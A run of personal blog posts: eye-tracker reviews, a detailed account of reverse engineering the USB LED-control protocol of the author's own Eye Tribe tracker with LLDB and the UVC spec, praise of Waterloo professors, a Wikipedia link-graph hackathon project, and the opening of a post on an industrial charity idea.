My lab has a Tobii Pro X2-30 which in many ways is similar to the Tobii EyeX. The main hardware difference is that it uses two cameras instead of one, but I assume they are lower resolution since it only needs USB 2.0 bandwidths instead of USB 3.0. The main legal difference is that you are allowed to record the gaze data with the pro models. The main practical difference is that the X2-30 costs over 50 TIMES as much. The price is not public and I imagine they quote different prices to different people. I’m not sure if my lab signed any agreements with regards to giving away the price so I’ll just say we paid somewhere over 50x the price of an EyeX.

The pros/cons and tracking performance are very similar to the Tobii EyeX. Unless you are doing a study where you need to record gaze data, the 50x increase in price is not worth it in my opinion.

Pros:

Extremely robust to head motion: your calibration will last practically forever. You can move your head around as much as you want and still maintain decent (2-3 degrees accuracy) tracking. This means you don’t have to calibrate every time you sit down, just keep your one calibration for an arbitrarily long time. The magnetic mount is extremely repeatable so it doesn’t need to be recalibrated.
Good accuracy: Although the accuracy degrades near corners, in general the tracker gives ~2.0 degrees of accuracy when not using a chin rest, which is quite good and slightly better than the EyeX.
Comes with very nice software. The SDK is nice and the software gives you a nice calibration test screen, a very pretty gaze trace, and some handy eye tracking desktop enhancements like warping your mouse cursor.
The new Analytics SDK 3.0 allows use with OSX and Linux.

Cons:

The nice EyeX software it works with is Windows-only.
Only specified to work on relatively small monitors by modern standards (22” diagonal).
I found that sometimes the tracked gaze would jump for half a second or so to a wildly inaccurate position ~15cm away from where I was looking. This is bad because it is harder to filter out and distinguish from a saccade.
Crazy expensive. This is not unique to Tobii. Basically every eye tracker intended for research (except the Pupil) is absurdly overpriced. Many research eye trackers cost in the range of $50,000.
Your head needs to be relatively low with respect to the monitor. I prefer my head to be near the top of my monitor but this is outside the non-adjustable view of the tracker from the monitor’s bottom edge. You can fix this by tilting your monitor upwards, I was lucky that my monitor had an adjustable stand.

XLabs Gaze Chrome Plugin: Best webcam only eye tracker

The XLabs chrome plugin allows you to do eye tracking on a web page using only a webcam and no special hardware. I’ve only ever had good results when trying out their EyesDecide software, although I was also in a different environment when I tried it that way.

Pros:

Basically your only option for eye tracking without special hardware. Allows you to do things like web usability eye tracking studies with only a laptop.
Free! The SDK is currently free to use, although that may change, and you don’t have to buy hardware.
Rather decent tracking. Quite impressive for a webcam tracker, can achieve 2-4 degree accuracies varying extensively by person, environment and calibration.
Fully cross platform, because it is just a Chrome plugin.

Cons:

Very long calibration process: If you want good results you need to go through a very long sequence of calibration dots, on the order of 30.
Very short lived calibration. It is not as robust to head motion as other trackers and becomes miscalibrated within a few minutes unless you are constantly calibrating with their dynamic calibration.
Very sensitive to lighting. You need bright light on your face, sitting near a window is best. If the lighting isn’t right it can sometimes barely work at all.
You can only use it within Chrome. No desktop apps.

Others

There are tons of crazy expensive research eye tracking systems that I haven’t tried for exactly that reason: they cost way too much. I’m sure some of them are quite excellent, but they cost as much as a car for hardware that certainly isn’t 1/10th that expensive to manufacture.

There’s two other sub-$1000 eye trackers I have not tried but I have read a bit about:

Gazepoint GP3

The Gazepoint GP3 is $500 and internally uses a Point Grey camera which probably has a 752x480 resolution, which is much lower than the Eye Tribe tracker. The only advantage it might have over the Eye Tribe is that it uses bright pupil tracking (so perhaps more robust) and their software might be better, but likely is not. Gazepoint’s software is also Windows only. I see no reason to consider this tracker over the cheaper and seemingly much better Tobii EyeX.

MyGaze

The MyGaze seems to be the deluxe consumer eye tracker. I haven’t bought it since it is outside my “just trying it out” budget when I already personally own 2 consumer eye trackers. However, there seem to be some glowing recommendations online from people who have tried other consumer eye trackers calling it the best of everything low cost. It is also made by engineers from SMI which is a super fancy expensive high quality research eye tracker company. There’s some recommendations and a video (that shows incredible <1 degree accuracy) on this forum thread. If you have the budget for it I recommend you try this tracker out (and then let me know how you like it).

One downside is that although the hardware only costs $500, you have to pay $900 to also get the developer SDK, unlike every other consumer eye tracker which gives away the SDK for free with the tracker.

The Eye Tribe Pro

The Eye Tribe is soon going to release a new tracker with new algorithms and supposedly better tracking on many dimensions for $200. I have no idea how good it will be or how it will compare to other low cost eye trackers.

A Reverse Engineering Adventure: Eye Tribe's USB Protocol

2016-02-02T00:00:00+00:00

Update: See bottom of the article for recent progress. I’ve managed to get a full 10-bit high def video feed and have released example code.

In 2014 I bought an Eye Tribe eye tracker hoping to work on some neat eye tracking projects. Unfortunately I’ve never been able to reach the fingertip level accuracy they claim and that I have seen in videos. I always get around +/- 5cm (2 inches) or more of jitter. Recently I’ve been working on eye tracking research again and I thought I would take a crack at debugging my accuracy issues.

There’s just one problem: The Eye Tribe’s tracking software is closed source and doesn’t have a debug view or a raw camera feed API. I’ve been wanting to try my hand at reverse engineering lately so I set myself the goal of reverse engineering the tracker’s USB protocol so that I could turn the tracker’s IR lights on and capture the IR video feed.

The Eye Tribe tracker is really just a USB 3.0 UVC camera (the standard webcam protocol) that shoots in monochrome IR. It also has bright IR LEDs that light up the user’s face since there isn’t much ambient IR indoors. Capturing the video is easy, the hard part is that the LEDs are controlled through a proprietary extension to the USB video camera protocol.

Thus I started on my quest to discover the special commands that would turn on those LEDs. In the end I figured out some cool techniques, and they helped me diagnose my issue (I haven’t solved it yet though). What could be useful to others is that the Eye Tribe is effectively a low cost (alternatives are >$500), high resolution, high frame rate IR camera with built in illuminators. This could be used for all sorts of computer vision projects like a cheap Vicon style motion capture system or an open source eye tracker.

Exploration

I started by installing USB Prober, a dev tool that lets you inspect the metadata of devices connected by USB. You can get practically the same information in the USB section of the built in “System Information” app but I installed USB Prober in case it gave more info.

I started looking through the USB info dump for the Eye Tribe tracker and discovered some good clues. First of all that it was a UVC camera, and that it was only a UVC camera, no other fancy USB control endpoints. I also noticed that there was a VDC (Control) Extension Unit interface: this was probably where the custom lights control messages could be sent.

I also figured out some other interesting things like the camera module being manufactured by Leopard Imaging and that it could capture high resolution 2304x1536 video at 27fps (that’s more than 1080p) and 768x1024 at 60fps. There are also a bunch of intermediate resolutions it can do at intermediate frame rates.

Attempting to Log

My next step was to try and log the USB traffic between the tracker and the eye tracking data server program The Eye Tribe provides. Unfortunately, Apple hasn’t updated the kernel extensions for USB logging for the latest OSs. Last time I tried installing them I nearly bricked my laptop because it couldn’t read any USB HID input, including the internal USB hub for the laptop’s keyboard and trackpad. I only rescued it by copying the Kext files from the recovery partition onto my main drive. I started backing up my entire disk instead of just my important files after that incident.

So instead I took the advice in this mail thread and tried usbtrace and dtrace instead. Unfortunately usbtrace showed megabytes per minute of all my system’s USB traffic in a not very useful format. dtrace showed me that control messages were being sent by the tracking server, and from what call stack, but not which messages and what they contained.

Disassembly

After logging failed, I tried a different approach. I downloaded the trial of Hopper 3 and loaded up the Eye Tribe server executable. Most of the method names were just numbered symbols but I managed to find an Objective C method called setUvcControl:withValue: that belonged to a class called UVCCameraControl. I tried tracing the callers to see if I could find any obvious light control code, but with no function symbol names, no source code, and only vaguely knowing x86_64 assembly, I wasn’t able to do it.

Instead I used class-dump on the server executable to look at the other methods. I Googled some of the method names and found that the UVCCameraControl class was open source (code on Github here). Now I had the source code for the mechanism used to send the messages, but I didn’t know what arguments it was being called with.

I read through the source of that class and started looking at the UVC protocol spec to make sense of what I found. I learned that auxiliary parameters of a camera are controlled and inspected by UVC control requests like SET_CUR and GET_CUR on different interfaces and with different control selectors. I figured out through reading the source code that the bit fields described in the protocol corresponded with the fields of OSX’s IOUSBDevRequest.

Debugging

I started on a new approach to try and log the control requests sent by the server through intercepting the method calls made by it. If I could print out the contents of the IOUSBDevRequest structs being sent, I could probably figure out which ones turned on the lights. So I fired up LLDB and set a breakpoint at the hex address of sendControlRequest: from the disassembly.

I started the server with the tracker connected and LLDB hit the breakpoint, but since there were no debug symbols, all I could look at was registers and assembly. I had no idea what the calling conventions were for Objective-C code, and looking them up and peeking at some memory didn’t seem to find the right things. So I kept stepping and reached down into IOUSBInterfaceClass::interfaceControlRequest(void*, unsigned char, IOUSBDevRequest*) which, although it didn’t have debug info, at least had an unobfuscated function name. I Googled this and found that Apple published the source code!

The registers and assembly weren’t helping me very much until, after an hour or two, I figured out how to find where the struct I wanted was located. The source code for IOUSBInterfaceClass::interfaceControlRequest(void*, unsigned char, IOUSBDevRequest*) showed it copying an IOUSBDevRequest into an IOUSBDevRequestTO and not much else. So I looked at the disassembly for that method in the debugger and saw a bunch of mov instructions copying the fields of the struct. They all looked something like:

0x100ae2fb0 <+14>: movb   %al, -0x28(%rbp)
0x100ae2fb3 <+17>: movb   0x1(%rbx), %al

Aha! At that point the struct I want must be pointed to by register %rbx, since the fields are being read at offsets from it and written to the stack copy relative to %rbp. I stepped to that point, and after figuring out the right casting and pointer indirection I printed out the second byte:

(lldb) e (int)((char*)$rbx)[1]
(int) $22 = 129

The second byte of the struct I wanted should be the UInt8 bRequest field, which should correspond to one of the constants in UVCCameraControl. Sure enough, after using irb to convert 129 to hex I got 0x81, which is the request code for UVC_GET_CUR. I had found it!

Logging (for real this time)

Now I needed to figure out how to print out the other fields and the data pointed to by the void *pData field, all fast enough that the tracking server wouldn’t get messed up. My strategy for this was to try and script LLDB to break at the exact right instruction, print out all of the fields, and then continue automatically.

I read about LLDB’s Python scripting capabilities, but the Python interface was poorly documented and could only really do anything with debug info, which I didn’t have.

So instead I figured out all the right casting invocations to print out the fields of the struct, which took a while. Then I figured out the exact offset from the start of the dynamic library I wanted to break at (the absolute address changed every time I started up the tracking server), set a breakpoint there and added a breakpoint command which printed the fields and then continued:

breakpoint set -a <address of IOUSBLib I found>+0x7fae
breakpoint command add 1
e ((uint64_t*)$rbx)[0]
e ((uint64_t*)$rbx)[1]
p *(uint32_t(*)[15])(((uint32_t**)$rbx)[1])
e ((uint32_t*)$rbx)[4]
c
DONE

Then I ran the code, connected the eye tracker, started the tracking UI (which turns on the lights), waited a bit, and shut down the tracking UI (turning off the lights). It output a bunch of data which I copy pasted into some text files.

Analysis

Now I had a log of the control requests, but as a couple 64 bit decimal integers in a copy-pasted LLDB log. So I had to write a script to parse out the various fields of the IOUSBDevRequest struct. I did this in Ruby, eventually producing this script.

First I had to parse the format, then I used bitwise operators to extract the various fields of the struct out of the integers and into fields of a Ruby hash. Now I had the raw data from the struct, but all the fields were still opaque numbers: next I had to interpret them.
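Here is a minimal Python sketch of that parse-and-extract step (it is not the Ruby script itself). It assumes each logged line has the same shape as the `(int) $22 = 129` output shown earlier, that the machine is little-endian x86_64, and that the first 8 bytes of the IOUSBDevRequest hold the standard USB setup fields in order: bmRequestType, bRequest, wValue, wIndex, wLength. The function names are made up for illustration.

```python
import re

# Matches LLDB expression output such as "(uint64_t) $5 = 12345".
LLDB_VALUE = re.compile(r"^\(.*\)\s+\$\d+\s+=\s+(\d+)\s*$")


def parse_lldb_value(line):
    """Return the decimal integer from one LLDB result line, or None."""
    match = LLDB_VALUE.match(line.strip())
    return int(match.group(1)) if match else None


def decode_setup_word(word):
    """Split the first 8 bytes of the struct, read as one little-endian
    64 bit integer, into the USB setup packet fields."""
    return {
        "bmRequestType": word & 0xFF,          # byte 0
        "bRequest": (word >> 8) & 0xFF,        # byte 1
        "wValue": (word >> 16) & 0xFFFF,       # bytes 2-3
        "wIndex": (word >> 32) & 0xFFFF,       # bytes 4-5
        "wLength": (word >> 48) & 0xFFFF,      # bytes 6-7
    }
```

Because x86_64 is little-endian, the first field of the struct ends up in the lowest bits of the integer, which is why bmRequestType is the low byte.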

I started by going back to the UVC protocol spec and copy-pasted some of the name tables in the appendix into hash literals in my script. I tried using these to map the numbers to names, but ended up with weird results. Then came a couple hours of fiddling, confusion and reading, as well as looking at how the records were constructed and correlating that with the spec. After the 5th try at mapping I figured out which fields came from where: I had to use the Terminal ID from USB Prober to decide which table to look up the control selector (high byte of the wValue field) in based on the unitID field (high byte of wIndex).
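The lookup I ended up with can be sketched roughly like this in Python. The request codes and PU_GAIN_CONTROL are from the UVC spec; the unit IDs (2 and 3) are specific to this tracker and are the ones that show up in my log. The table and function names are invented for the sketch, and only the handful of entries that appear in this post are filled in.

```python
# Request codes from the UVC spec (only the two that appear in this post).
REQUESTS = {0x01: "UVC_SET_CUR", 0x81: "UVC_GET_CUR"}

# Unit IDs are device specific; these are the ones this tracker reports.
UNITS = {2: "VC_PROCESSING_UNIT", 3: "VC_EXTENSION_UNIT"}

# Control selector names depend on the unit type. Extension unit selectors
# are vendor defined, so there are no standard names for them.
SELECTORS = {"VC_PROCESSING_UNIT": {0x04: "PU_GAIN_CONTROL"}}


def interpret(fields):
    """Add human readable names to a decoded control request."""
    out = dict(fields)
    out["selector"] = fields["wValue"] >> 8   # high byte of wValue
    out["unitId"] = fields["wIndex"] >> 8     # high byte of wIndex
    out["req"] = REQUESTS.get(fields["bRequest"], "UNKNOWN")
    out["unit"] = UNITS.get(out["unitId"], "UNKNOWN")
    msg = SELECTORS.get(out["unit"], {}).get(out["selector"])
    if msg is not None:
        out["msg"] = msg
    return out
```

The key point is that the selector table has to be chosen by unit type first: selector 4 means gain on the processing unit but something vendor specific on the extension unit.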

Finally I got results that made sense: before the lights turned on the server sent a couple UVC_SET_CUR requests to the extension unit. It looked like this:

{:bmRequestType=>33, :bRequest=>1, :wValue=>768, :wIndex=>768, :wLength=>2, :selector=>3, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[15, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}
[63, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>768, :wLength=>8, :selector=>4, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[250, 0, 240, 0, 250, 0, 240, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1536, :wIndex=>768, :wLength=>2, :selector=>6, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[44, 1]
{:bmRequestType=>33, :bRequest=>1, :wValue=>512, :wIndex=>768, :wLength=>4, :selector=>2, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[0, 0, 0, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}
[51, 0]
... more of the same message with small adjustments to the gain around level 51 ...
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}
[51, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>768, :wIndex=>768, :wLength=>2, :selector=>3, :unitId=>3, :req=>"UVC_SET_CUR", :unit=>"VC_EXTENSION_UNIT"}
[0, 0]
{:bmRequestType=>33, :bRequest=>1, :wValue=>1024, :wIndex=>512, :wLength=>2, :selector=>4, :unitId=>2, :req=>"UVC_SET_CUR", :unit=>"VC_PROCESSING_UNIT", :msg=>"PU_GAIN_CONTROL"}

So it looks like there are a couple requests sent to the extension unit, but only selector 3 is sent with a positive value when the lights are turned on and later a zero when the lights are turned off.

Capture

Now I just had to test my theory by writing an app that sent the right UVC control requests. I used OpenFrameworks since it comes with a camera capture example that uses QtKit (which is deprecated but allegedly UVCCameraControl doesn’t work with AVFoundation). I linked in the ofxUVC addon but ended up just calling the Obj-C class directly. I started by fiddling with the gain setting and managed to even see myself a little bit without the IR illuminators turned on.

Then I tried sending selector 3 with a value of 15 to turn the lights on, and it worked first try! The lights didn’t turn off when I shut down my test app, but that was an easy fix of adding another control message setting it to 0.
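For anyone who wants to reproduce this without the Obj-C class, here is a hedged Python sketch that just builds the control request fields matching my log. My test app did not use this code. The interface number of 0 is an assumption taken from the low byte of wIndex in the log, and `led_request` is a made-up name.

```python
UVC_SET_CUR = 0x01
# 0x21 = host-to-device, class request, addressed to an interface.
REQUEST_TYPE_SET = 0x21
EXTENSION_UNIT_ID = 3  # unit ID of the extension unit in the log
LED_SELECTOR = 3       # the selector that changed with the lights
INTERFACE = 0          # assumed: low byte of wIndex was 0 in the log


def led_request(level):
    """Build (bmRequestType, bRequest, wValue, wIndex, data) for setting
    the LED level. The payload is 2 bytes, little-endian, as in the log."""
    if not 0 <= level <= 0xFFFF:
        raise ValueError("level must fit in 16 bits")
    data = level.to_bytes(2, "little")
    w_value = LED_SELECTOR << 8
    w_index = (EXTENSION_UNIT_ID << 8) | INTERFACE
    return (REQUEST_TYPE_SET, UVC_SET_CUR, w_value, w_index, data)
```

`led_request(15)` gives the request that turned the lights on and `led_request(0)` the one that turns them off. With a library like PyUSB the tuple could in principle be passed along as `dev.ctrl_transfer(*led_request(15))`, but I haven’t tested that path against the tracker.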

Victory!

That picture is captured with a gain level of around 0 but I noticed in the logs that the tracking server was setting the gain level around 51. But when I adjusted the gain that high, the 8 bit green values used to hold the image started wrapping around leading to a messed up image. This might be the cause of the tracking quality issues I’ve been having, but the real server might do something to mitigate this. Edit: I’ve since discovered that lowering the exposure to compensate negates this issue, so I assume the real server uses a higher frame rate and lower exposure so they need the high gain setting. Another neat thing about the exposure is if you set it really long it can effectively take still pictures without the LEDs on.

Next I used the feature of the demo app to save a video to my drive, which interestingly started replacing some frames with pure green, which didn’t happen at all in the live preview. I later discovered that the 1 minute movie it saved was 10 gigabytes because it wasn’t using any compression. It is possible the dropped frames were my SSD bottlenecking the video capture. Anyhow I compressed it down with Handbrake and uploaded it to Youtube, sorry for the annoying green frames.

In the video below you can see me looking at the four corners of my screen, and then some things on the screen. I then slowly adjust the gain setting upwards until it reaches 51 at which point I wave my arms around to mark the time. Then I continue adjusting the gain up to maximum.

Update

After I first published this post I emailed The Eye Tribe with my info and story, and I got some help and info from them. It turns out that the eye tracker isn’t working in as large of an area as it should (not sure why) so I can only use a 12” diagonal area of my screen instead of the full 24”. If I use the small area I get much better accuracy, closer to +/- 1cm of jitter and a 0-4cm offset from my true gaze location. This is still not as good accuracy as advertized and it works on a much smaller area than advertized, but it is better than before. It is still entirely useless to me though, the accuracy is good enough for my project, but the area is too small. Note that I have seen videos of other people achieving the claimed accuracy, it is likely that there is still some special complicating factor with my unit or setup, most customers probably have no issues.

This post is also not meant to bash The Eye Tribe. They’re my second favourite eye tracking company after Pupil Labs. Despite their closed source software they are still significantly more open than most other eye tracking companies, with orders of magnitude lower cost.

Update 2

I’ve now figured out how to properly retrieve high resolution 60fps video at the full 10 bit depth. The tracker has a variety of resolutions available, but higher resolutions only work with lower frame rates. The highest resolution is 2304x1536 which is available at 27FPS. Some of the resolutions offered are scaled down versions of the full image, whereas others are cropped areas of it. In order to get the full 60FPS you have to lower the exposure time, which significantly increases the noisiness of the image.

The pixels are encoded in YUY2 format where the lowest 8 bits of brightness are in the Y component and the highest 2 are in the UV component.
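As a rough Python sketch of unpacking that: YUY2 interleaves a Y byte with a chroma byte for every pixel, so this assumes the top 2 bits live in the low 2 bits of the chroma byte right after each Y byte (which makes each pixel effectively a 16 bit little-endian value). That bit position is an assumption of the sketch, not something spelled out above, and the function names are made up.

```python
def unpack_10bit(frame):
    """Turn raw YUY2 bytes into a list of 10 bit brightness values.

    Assumes byte 2*i is the low 8 bits of pixel i and the low 2 bits of
    byte 2*i + 1 are its high 2 bits.
    """
    if len(frame) % 2 != 0:
        raise ValueError("frame must contain whole (Y, chroma) byte pairs")
    pixels = []
    for i in range(0, len(frame), 2):
        low = frame[i]
        high = frame[i + 1] & 0x03
        pixels.append((high << 8) | low)
    return pixels


def to_8bit(pixels):
    """Naive reduction to 8 bits: drop the 2 least significant bits."""
    return [p >> 2 for p in pixels]
```

Dropping the low bits like `to_8bit` does keeps the full range but makes dark regions such as pupils very hard to tell apart, so a real pipeline would probably want some kind of gain or contrast stretch first.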

I’ve created a project on Github called SmartGaze where I’ve done a little bit of work on implementing eye tracking algorithms for the Eye Tribe. So far I’ve retrieved the raw feed using libuvc, found the eye regions using glints, and then used an implementation of the Starburst algorithm to locate the iris ellipse. The repo is released under the GPLv2 but an earlier commit containing just the code to read the raw 10 bit feed is released under the MIT license. I may or may not decide to finish this given that I recently got a Steelseries Sentry that works well for me when I run it in a Windows VM and pipe the data over UDP to my mac.

Here’s a video of the raw feed. The fact that you can hardly see the pupils in this video is a product of how I reduced the 10 bit image down to 8 bits, as well as not setting the PU_GAIN UVC control. More recent commits of SmartGaze use a much brighter video, but one that washes out details of the face.

Amazing Profs of Waterloo 2015

2015-11-19T00:00:00+00:00

During my three terms at The University of Waterloo so far every single professor I’ve had has been quite good. Some however, are amazing. Each of these amazing profs is amazing in very different ways. Some are great lecturers, some great teachers and some great people.

In this post I’ll highlight some of the great professors I’ve had so far and what makes them amazing.

Prabhakar Ragde (CS 146) - The Educator

Prabhakar is the most dedicated teacher I have ever had. He spends an incredible amount of time and effort refining his lecture material and designing his courses to be the best they can be. He goes above and beyond to make sure that students learn in the best way possible. He had some trouble finding a good way to teach self-balancing binary trees, so he went and did original research and formulated a purely functional self-balancing binary tree data structure whose main advantage is being easier to learn. It seems to almost physically pain him to see something not taught well. Every teacher should aspire to be as good at teaching as Prabhakar is.

Protip™

He teaches the advanced CS courses in first year, but he teaches them so well that for many people they are easier than the normal courses. The material is indeed more advanced, but the assignments are less work and the tests have bonus marks so it is easier to get high marks. I highly recommend taking CS 145 and 146.

He is also addicted to Twitter, follow him if you want to know about all the fancy food he eats.

Jan Kycia (MNS 101) - The Renaissance Man

Jan’s lectures are good, he’s an effective speaker and does very neat physics demos in class. What is really incredible about him is his breadth and depth of knowledge. Never in my life have I met anybody so knowledgeable in so many different fields. He’s a physicist by training, but also knows a ton about electronics, engineering, machining, measurement, plumbing, materials and really cold things. He leads a low temperature lab (he says “millikelvin” a lot) where he uses all these skills to build some highly impressive things. Have I mentioned he’s also really nice and friendly?

I would say that “Any sufficiently advanced technologist is indistinguishable from a wizard” except that Jan will gladly show you all of his tricks if you ask. I have an incredible amount of respect for Jan and look up to him as a model of a truly formidable human being.

Protip™

After every class for around 40 minutes he answers student questions, goes on interesting tangents, and sometimes gives lab tours and descriptions of his research. It is very much worth your time to stick around for these, I have never once regretted staying after class to learn new and interesting things from him, even if they aren’t part of the course. Especially follow him whenever he brings students down to the lab to pick up assignments, that place is a technological wonderland and he gives amazing tours and research overviews if you ask.

Also, MNS 101 (an introduction to material science) is a great course to take. It is very interesting and is a science that most people haven’t had any exposure to in high school.

Things I have seen in his lab

Custom-designed electronic measurement equipment.
High-precision custom-machined heat pumps.
Custom-made vibration isolating vacuum pipe flexures.
Superconducting silicon wafer integrated circuits custom-fabricated in house.
Decades-old equipment that he has scavenged for pennies on the dollar and then painstakingly fixed up to working condition.

Examples of things he has talked about after class

The little-known secrets to creating incredibly pure samples of a material using a plasma arc melter, electrical discharge machining, acid baths, and many other steps.
How to procure an x-ray crystallography set-up on the cheap by buying used DNA fluorescence scanners from hospitals.
The different types of superconducting and non-superconducting wire to use at temperatures approaching 0 kelvin.
The design factors to take into account when reducing vibrational heating through pipe flexures that must handle vacuum forces.
How to create strong non-heat-conductive supports by cutting up carbon fiber hunting arrows.

Eric Helleiner (PSCI 150) - The Lecturer

Helleiner’s lectures just make you want to listen. He’s enthusiastic about what he teaches in a very friendly way. I just really like listening to him talk about interesting political science things. He’s also knowledgeable and teaches interesting PSCI classes, but the reason he’s on this list is that his lectures are just really enjoyable.

Protip™

Go to his office hours some time, maybe bring a friend, and just talk to him about interesting politics things. I skipped class to do this once and me and my friend chatted with him for over an hour.

Wikipedia Link Graphs and Terrible Hacks

2015-03-30T00:00:00+00:00

A couple months ago Dave Pagurek and I decided on making an arbitrary scale finder for the upcoming UWaterloo “stupid shit no one needs” hackathon. I decided that I would do this by finding paths in the links between Wikipedia pages. The thing is to do this I needed a good data set in the right format.

I did some research and found Six Degrees of Wikipedia which had some information but no data or source files. I then found Graphipedia but discovered that Neo4j was not fast enough to do what I wanted. Thus I embarked on the adventure of creating my own Wikipedia link graph data set designed for efficient execution of common graph algorithms. The premise was compressing the whole graph into a small(ish) file that would fit entirely in memory, so I called it Wikicrush.

I spent the next few weeks occasionally working on a set of Ruby scripts that in multiple stages processed the 10GB compressed enwiki-20150205-pages-articles.xml.bz2 file into two 500MB files: xindex.db and indexbi.bin. For each stage in the process I ensured that it worked in O(n) time and reasonable memory. This way I could crunch through the entire thing over a day on a cheap VPS. During development I would use the smaller Simple English wiki which I could process in a few minutes on my laptop. The advantage of the multi-stage design is that if I needed to tweak something I could just re-run the stages after that point rather than the whole thing. The intermediate files it created were also very useful for debugging and could be useful data sets in their own right.

I ended up with two files I’m rather proud of. One is a binary link graph in a custom format I designed to fit in memory and allow very efficient searching and processing. The other is simply an Sqlite index designed to translate article titles into offsets into the binary file and back again. The formats are fairly easy to work with in any imperative language and have many handy features. I documented the formats in detail in the Wikicrush readme. They work so well that my $10/month VPS can easily breadth first search through millions of articles in less than a second.
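To give a feel for why a flat in-memory format makes breadth first search so cheap, here is a small Python sketch. The layout is invented for this example and is simpler than the real Wikicrush format (see the readme for that): each page is stored at some offset as a link count followed by that many offsets of other pages.

```python
from collections import deque


def shortest_path(graph, start, goal):
    """Breadth first search over a flat list of ints.

    Illustrative layout only: graph[o] is the number of links of the page
    at offset o, and graph[o + 1 : o + 1 + count] are the offsets of the
    pages it links to. Returns a list of offsets, or None if unreachable.
    """
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while node is not None:
                path.append(node)
                node = parent[node]
            return path[::-1]
        count = graph[node]
        for target in graph[node + 1 : node + 1 + count]:
            if target not in parent:
                parent[target] = node
                queue.append(target)
    return None


# Four pages: A at offset 0 links to B (3) and C (5); B and C both link
# to D (7); D has no links.
example = [2, 3, 5,  1, 7,  1, 7,  0]
```

Since links are stored as offsets, following a link is just an array index with no title lookups or hashing of strings in the inner loop. The Sqlite index is only needed at the edges, to turn titles into offsets and back.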

I had the initial version working fairly quickly but had to spend a bunch of time fixing small bugs to get it to accurately represent the actual link graph of Wikipedia. I had to fix things like following redirects, cutting out broken links, ignoring links in comments and proper handling of case in links (I ended up lowercasing everything). Although making your own Wikipedia data set may seem easy at first, there’s plenty of ways things can go wrong. Many times I thought I had a good complete data set and only later would I realize something was wrong. One time I thought I had finally worked out the kinks and then discovered weeks later that it thought 70% of links on Wikipedia were invalid, which obviously isn’t true. Even just yesterday I found and fixed a little bug that only affected 300 articles, but the perfectionist in me sent my VPS to slave away for another 40 hours of rebuilding.

Edit: I recently found another glitch and overhauled the entire process to be more robust. I now think I’ve shaken out all the bugs so I have put up a download of the final product. You can find the link on the Wikicrush readme. I also no longer need to lowercase everything. This is AFAIK the only Wikipedia link graph dataset available for public download.

The Terrible Hacks Hackathon

During the hackathon some parts went very smoothly while others did not. Working with the files I had created was very easy, working with the Rust language for my first time was not. At some point I could not link my graph search algorithm to the Iron web framework because my algorithm and Sqlite connection were not thread safe and one can not disable type system based thread safety checks in Iron with Rust. I ended up with a suitably terrible hack which was having the Rust code communicate over stdin/stdout and having a Ruby Sinatra server interface with that. Along with that, all the paths were hard coded, it required a specific rustc commit and one had to manually fiddle with the Cargo.toml and Cargo.lock files to work around a bug in Cargo just to get it to compile. This made it practically impossible to install and run on anything but my laptop.
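The stdin/stdout hack boils down to a line based request and response protocol between two processes. Here is a self-contained Python sketch of the pattern, with a tiny Python child process standing in for the Rust path finder and a plain class standing in for the Sinatra side. All names here are invented, and the child just echoes its input rather than searching a graph.

```python
import subprocess
import sys

# Stand-in for the path finding binary: reads "start goal" lines on stdin
# and answers each one with a single line on stdout.
WORKER_SOURCE = """
import sys
for line in sys.stdin:
    start, goal = line.split()
    print(f"{start} -> {goal}", flush=True)
"""


class Worker:
    """Keeps one child process alive and sends it one query per line."""

    def __init__(self):
        self.proc = subprocess.Popen(
            [sys.executable, "-c", WORKER_SOURCE],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            text=True,
        )

    def query(self, start, goal):
        self.proc.stdin.write(f"{start} {goal}\n")
        self.proc.stdin.flush()  # make sure the child sees the line now
        return self.proc.stdout.readline().strip()

    def close(self):
        self.proc.stdin.close()  # EOF ends the child's read loop
        self.proc.wait()
        self.proc.stdout.close()
```

The important details are flushing on both sides and keeping to exactly one line per request and one per response, otherwise the two processes end up waiting on each other. It also only handles one query at a time, which is fine for a terrible hack.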

I eventually got things hacked together and by that time Dave had put together a fantastic front end with fancy CSS, autocomplete and REST loading. All I had to do was serve his static files and expose a JSON API.

Once we did that we had a product, and it ended up working great. The paths it generated were amusing and it was fun to use. Not to mention it looked pretty good for something put together in one afternoon:

The Rewrite

A week later I decided to kill two birds with one experimental statically-typed stone and learned the Nim language by rewriting the project in it. I ran into a couple similar problems with the Jester web framework and loading the file into an int32 array but unlike the similar problems in Rust these had easy workarounds. In the end everything worked reasonably well with Nim especially after I got some help on IRC from its creator.

You can now visit and try out Rate With Science powered purely by Nim and backed by Wikicrush.

Idea: A Viral Industrial Charity

2015-03-14T00:00:00+00:00

Deviating from the usual programming content of this blog, I’d like to talk about an idea I’ve been thinking about recently. This week I went to a talk by Lewis Dartnell, author of the most interesting non-fiction book I’ve ever read, called The Knowledge. It’s a book that explores the essential science and technology necessary to build a modern society from the perspective of bootstrapping civilization after the apocalypse. The apocalypse is merely a convenient thought experiment though; it’s a fantastic read just to learn about all the hidden industrial processes and science that keep the world working today.

Personally the book got me thinking about how this idea of bootstrapping might help in the modern world. I also learned about the fundamental behind the scenes industrial processes that keep the world running, like the Haber-Bosch Process and the production of fundamental chemicals like lime. It gave me huge respect for how incredibly difficult it is to create an industrial civilization.

